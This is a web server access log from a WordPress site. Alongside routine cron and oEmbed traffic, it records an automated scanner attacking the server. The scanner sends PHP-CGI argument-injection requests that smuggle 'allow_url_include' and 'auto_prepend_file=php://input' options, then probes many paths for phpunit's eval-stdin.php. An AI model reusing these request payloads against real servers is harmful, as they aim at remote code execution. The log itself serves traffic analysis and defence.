193.142.147.209 - - [25/Jan/2026:03:14:09 +0800] "POST / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:03:21:57 +0800] "POST /wp-cron.php?doing_wp_cron=1769282517.7192800045013427734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.159.140.236 - - [25/Jan/2026:03:21:57 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F HTTP/1.1" 200 1128 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:03:26:51 +0800] "POST /wp-cron.php?doing_wp_cron=1769282811.4158890247344970703125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.248.14.48 - - [25/Jan/2026:03:26:51 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31367 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:53 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 157416 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:54 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:54 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:54 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:55 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:55 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:55 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:55 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:56 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:56 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:56 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:57 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:57 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:57 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:58 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:58 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:58 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:59 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:59 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:26:59 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:00 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:01 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:01 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:01 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:02 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:02 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
